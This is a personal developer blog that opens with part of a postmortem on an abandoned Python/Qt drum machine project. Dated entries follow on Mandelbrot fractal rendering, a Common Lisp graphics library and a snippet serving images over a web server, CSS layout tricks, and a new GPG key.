I think that we spent more time on the website that it took to come up with 0.1. One thing that is sure is that I spend a lot more time in the Gimp than on the code. Impressive GUIs are not developer friendly. OBB 0.1 would heat 40% of the CPU so we had to optimize some stuff before we could go any further. I rewrote the whole redrawing code many times. Python is fast enough most of the time but it's integer performance is bad and psycho was not enough. When you have only rectangular widgets, you can computed the bounding box of the region to redraw with only two point. OBB has arbitrarily shaped widgets, you can't easily compute what is hidden by other widgets, you have to redraw all the widget stack in a region when it's invalidated. With lots of shortcuts and caching, the bottle neck of the redrawing was not OBB anymore, it was X. It seems that X doesn't like to have arbitrarily shaped windows. So keeping the drawing fast meant to have as less animation as possible, which is no good for an impressive GUI if you ask me.

CSound too is slow. If you try to sequence a few samples, it's fast but if you add effects, it's really slow. That, we could not know until we add the effects support. Our solution was to pre-compute some samples with the effects in and only ask CSound to sequence those. That lead to some really unintuitive user interface. When playing with the panning bar, we didn't wanted to compute a panned sample until we knew the final panning so it had no effects until the user release the mouse button. Then you would see the label stop scrolling for a split second and the beat continued with the new panning. To support effect properly we would have to drop CSound or to do some massive hack. Ok I don't know too much about the sound part so I'll let Vince elaborate further in his postmortem.

Then Trolltech, the maker of Qt, decided to stop producing a non-commercial version of Qt on Windows. That would mean no more portability. Yes, we could live without portability, sound effect and animations but that would put us quite fare from our initial goal. When we realized that we needed from massive re-write, well it never came. The fact that neither of us used a beat box before is a bit telling too. We were looking for a nice project but that one wasn't particularly scratching an itch of ours.

So to summarize, you should code something that you plan to use, it will help usability a lot. You should use whatever technology that will let you put together a working prototype as fast as possible. Once you have your working prototype, you have to be really critical. Is the technology up to the task ? Really ? Do you need to review the features priorities ? Custom GUIs are really nice to look at but not so nice to use an really painful to maintain. Think about it before you commit to a particular design. And finally, if you are not happy with your prototype and plan to move to something else, make it clear so people won't be refreshing your website waiting for the next release. Hence this postmortem. You have plenty of choice now if you want a drum machine on GNU/Linux. Wired looks great and is coded by people who cares about music and Hydrogen is quite usable and has a really good documentation. Now let me play with my fractals!

2005-01-06 New Layout

Finally, I retouched the layout. After so much time with the minimal style, I felt for a graphical intensive display once again. The blue color map was just too relaxing, I spent the night zooming in and I ended up with a few nice spots. The effect is known as "pure CSS compositing", you can learn more about it on CSS/edge. Basically you need two images, a vivid one for the body background and a washed out one for the text background. You need huge images but the washed out one will compress nicely. Tip: for the Mandelbrot Set we typically have one color per iteration. The point get it's color from the number of iterations it takes for it to escape. For 255 or less iterations, you can use color index images without any loss of quality.

Making the washed out image out of the vivid one is pretty straight forward, you just paste a white layer and set opacity to ~80%. A script to update the background would be a few lines, provided that you have enough nice spots and bandwidth. At the moment the zooming is a bit broken in Frat, I can't just pick the URL from good spots and make bigger renders, I need to play with the zoom. Once this is fixed, we'll see how far I'm willing to take it.

2005-01-05 More fractals

Once save-canvas-to-stream was in poly-pen, there was no reasons for me not to hook fract in Araneida. Quite easy, just create a handler and save to the socket stream.

      (poly-pen:with-defaults (:backend
                               :sdl
                               :canvas (:width width :height height))
        
        (render center width height (float zoom) nb-iter color-opt)
        (araneida:request-send-headers request
                                       :content-type "image/bmp")
        (poly-pen:save (araneida:request-stream request)))

So you can now zoom the Mandelbrot Set wherever you are. The color map is still static in the web interface, the default is a nice relaxing blue map. I don't know if I should let the user play with the color map. Everyone I explain the color spiral map to seems to get confused and keep nodding politely while his eyes show that he is completely lost. I will probably end up doing a renderer for a color wheel the puts a big fat black like on the spiral path. Anyway, you read enough of that and you deserve some nice images. Ain't that blue map relaxing ? I could zoom it all night long...

2005-01-02 Drawing in CL

I decided that I would do more code in 2005. I know that you forget quite fast all the stuff you decide on the new year's eve so I lost no time and coded a graphical proxy layer for Common Lisp: Poly-pen. Now that it's done, I can spend the rest of the year refreshing /.!
 : )

2004-10-13 GPG Key

I have a new GPG key. Be sure to update your keyrings (and to check my id (and to sign my key)).

2004-10-13 Hi-res Fractals

I made a few hi resolution, ready to print, images of the Mandelbot Set

I'm still experimenting with the color map, those are better than the first images but I still see some aspects that could be improved. The shade is now linear. That means that if I crank the number of iterations, most of the color map ends up near the black border of the set. With a progressive color map it should be possible to render and image with well defined edges without wasting all the colors in the transition area.

Stay tuned!

2004-10-10 Fractals

It's been a long time since I updated that page, I hope you didn't waste too much time clicking refresh. I made a basic Mandelbrot Set zoomer. Be sure to check the pretty pictures! The code is in my GNU Arch archive: ygingras@ygingras.net--2004/fract--devel--0
Enjoy! : )

2003-11-24 Nethack

I finally finished NetHack and I recorded the whole thing so you'd better enjoy !


Copyright © 2001-2005 Yannick Gingras <ygingras@ygingras.net>

You can use my public key to send me secure transmissions.

Valid XHTML 1.0! Valid CSS!